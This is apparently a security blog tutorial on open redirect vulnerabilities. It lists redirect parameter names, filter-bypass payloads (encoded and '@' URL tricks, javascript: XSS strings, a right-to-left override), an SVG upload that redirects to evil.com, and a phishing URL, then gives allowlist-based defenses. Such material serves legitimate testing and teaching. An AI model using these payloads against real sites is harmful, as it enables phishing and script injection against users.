Open Redirect Vulnerability: Exploitation, Prevention & Real-World Examples

Basic info — Open Redirect

Open Redirect (also known as Unvalidated Redirects and Forwards) occurs when a web application accepts user-supplied input and redirects the user to an arbitrary URL without proper validation.

How to find entry points to test?

• Burp Proxy history & Burp Sitemap (look at URLs with parameters)
• Google dorking. E.g: inurl:redirectUrl=http site:target.com
• Functionalities usually associated with redirects:
• Login, Logout, Register & Password reset pages (Change site language, Links in emails, Read JavaScript code)
• Bruteforcing
• Look for hidden redirect parameters, for e.g.:

/redirect?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}

/?url={payload}&next={payload}&redirect={payload}&redir={payload}&rurl={payload}&redirect_uri={payload}

Responses to look for when fuzzing

1. HTTP redirect status codes

• 300 Multiple Choices
• 301 Moved Permanently
• 302 Found
• 303 See Other
• 304 Not Modified
• 305 Use Proxy
• 307 Temporary Redirect
• 308 Permanent Redirect

2. Alert box popping up

Open redirect

Identifying Open Redirect Vulnerabilities

Many applications use redirection parameters like:

/{payload}
?next={payload}
?url={payload}
?target={payload}
?rurl={payload}
?dest={payload}
?destination={payload}
?redir={payload}
?redirect_uri={payload}
?redirect_url={payload}
?redirect={payload}
/redirect/{payload}
/cgi-bin/redirect.cgi?{payload}
/out/{payload}
/out?{payload}
?view={payload}
/login?to={payload}
?image_url={payload}
?go={payload}
?return={payload}
?returnTo={payload}
?return_to={payload}
?checkout_url={payload}
?continue={payload}
?return_path={payload}
success=https://www.verylazytech.com
data=https://www.verylazytech.com
qurl=https://www.verylazytech.com
login=https://www.verylazytech.com
logout=https://www.verylazytech.com
ext=https://www.verylazytech.com
clickurl=https://www.verylazytech.com
goto=https://www.verylazytech.com
rit_url=https://www.verylazytech.com
forward_url=https://www.verylazytech.com
@https://www.verylazytech.com
forward=https://www.verylazytech.com
pic=https://www.verylazytech.com
callback_url=https://www.verylazytech.com
jump=https://www.verylazytech.com
jump_url=https://www.verylazytech.com
click?u=https://www.verylazytech.com
originUrl=https://www.verylazytech.com
origin=https://www.verylazytech.com
Url=https://www.verylazytech.com
desturl=https://www.verylazytech.com
u=https://www.verylazytech.com
page=https://www.verylazytech.com
u1=https://www.verylazytech.com
action=https://www.verylazytech.com
action_url=https://www.verylazytech.com
Redirect=https://www.verylazytech.com
sp_url=https://www.verylazytech.com
service=https://www.verylazytech.com
recurl=https://www.verylazytech.com
j?url=https://www.verylazytech.com
url=//https://www.verylazytech.com
uri=https://www.verylazytech.com
u=https://www.verylazytech.com
allinurl:https://www.verylazytech.com
q=https://www.verylazytech.com
link=https://www.verylazytech.com
src=https://www.verylazytech.com
tc?src=https://www.verylazytech.com
linkAddress=https://www.verylazytech.com
location=https://www.verylazytech.com
burl=https://www.verylazytech.com
request=https://www.verylazytech.com
backurl=https://www.verylazytech.com
RedirectUrl=https://www.verylazytech.com
Redirect=https://www.verylazytech.com
ReturnUrl=https://www.verylazytech.com

If these parameters are processed without validation, they might be vulnerable.

Passive Detection

1. Check URL parameters — Look for redirect-related keywords in URLs.
2. Analyze HTTP responses — Look for 302 Found or 301 Moved Permanently responses.
3. Check developer console (F12) and network traffic — Inspect redirects.

Active Testing (Manual and Automated)

• Modify the URL and inject external domains:

https://example.com/login?redirect=https://evil.com

• Using Burp Suite’s Intruder to fuzz redirection parameters.
• Using tools like Oralyzer:

python3 oralyzer.py -u "https://example.com?redirect="

Exploiting Open Redirect Vulnerabilities

Basic Open Redirect Exploitation

If an application blindly trusts user input, you can redirect a victim to a malicious website:

https://example.com/login?redirect=http://evil.com

or use encoded URLs:

https://example.com/login?redirect=%68%74%74%70%3a%2f%2fevil.com

Redirect to Localhost (Bypass Authentication)

If an application allows redirection to localhost:

https://example.com/login?redirect=http://127.0.0.1

It can be used to:

• Redirect an admin panel login to an internal resource.
• Exploit internal APIs (in SSRF attacks).

URL Format Bypass

Some applications attempt to restrict external domains but allow different URL formats:

https://example.com/login?redirect=//evil.com
https://example.com/login?redirect=//evil.com@trusted.com

• //evil.com is a shorthand for https://evil.com.
• @Trusted.com is ignored by some browsers.

Open Redirect to XSS

Some browsers allow JavaScript-based redirects if improperly filtered.

Basic Payloads

javascript:alert(1)

or bypassing javascript filters:

java%0d%0ascript%0d%0a:alert(0)

Using Comments and Encoding

javascript://sub.domain.com/%0Aalert(1)
javascript://%250Aalert(1)
javascript://%250A1?alert(1):0

SVG File Exploit (Open Redirect via File Upload)

Some applications allow uploading SVG files that can trigger JavaScript execution:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg onload="window.location='http://evil.com'" xmlns="http://www.w3.org/2000/svg">
</svg>

If the website automatically loads SVG files, the redirection will be triggered.

Exploiting Open Redirect for Phishing

Attackers can craft realistic-looking URLs to trick users:

https://bank.com?redirect=https://bank.com.evil.com

Users might not notice the difference and enter their credentials.

Tools for Automating Open Redirect Testing

Oralyzer (Automated Open Redirect Scanner)

• GitHub: https://github.com/0xNanda/Oralyzer

Run the tool:

python3 oralyzer.py -u "https://example.com?redirect="

Fuzzing with Payload Lists

• https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Open Redirect

Defense Against Open Redirects

Input Validation

• Only allow whitelisted domains for redirection:

allowed_domains = ["mysafedomain.com"]
if parsed_url.netloc not in allowed_domains:
return "Invalid redirect URL"

Use Relative URLs Instead of Absolute

Instead of:

header("Location: ".$_GET['redirect']);

Use:

header("Location: /dashboard");

URL Sanitization

Ensure the redirect URL starts with a trusted domain:

if (!preg_match("/^https:\/\/mysafedomain\.com/", $_GET['redirect'])) {
die("Invalid redirect URL");
}

Code examples

.Net

response.redirect("~/mysafe-subdomain/login.aspx")

Java

response.redirect("http://www.verylazytech.com");

PHP

<?php
/* browser redirections*/
header("Location: http://www.verylazytech.com");
exit;
?>

Tips

• Try using the same parameter twice: ?next=whitelisted.com&next=google.com
• If periods filtered, use an IPv4 address in decimal notation http://www.geektools.com/geektools-cgi/ipconv.cgi
• Try a double-URL and triple-URL encoded version of payloads
• Try redirecting to an IP address (instead of a domain) using different notations: IPv6, IPv4 in decimal, hex or octal
• For XSS, try replacing alert(1) with prompt(1) & confirm(1)
• If extension checked, try ?image_url={payload}/.jpg
• Try target.com/?redirect_url=.uk (or [any_param]=.uk). If it redirects to target.com.uk, then it’s vulnerable! target.com.uk and target.com are different domains.
• Use /U+e280 RIGHT-TO-LEFT OVERRIDE: https://whitelisted.com@%E2%80%AE@moc.elgoog
• The unicode character U+202E changes all subsequent text to be right-to-left
• E.g.: https://hackerone.com/reports/299403

🎉 Join the VeryLazyTech community today and level up your skills! 🎉

Become VeryLazyTech member! 🎁

Follow us on:

• ✖ Twitter @VeryLazyTech.
• 👾 Github @VeryLazyTech.
• 📜 Medium @VeryLazyTech.
• 📺 YouTube @VeryLazyTech.
• 📩 Telegram @VeryLazyTech.
• 🕵️‍♂️ My Site @VeryLazyTech.

Support us and buy me a coffee. ☕

Visit our shop for e-books and courses. 📚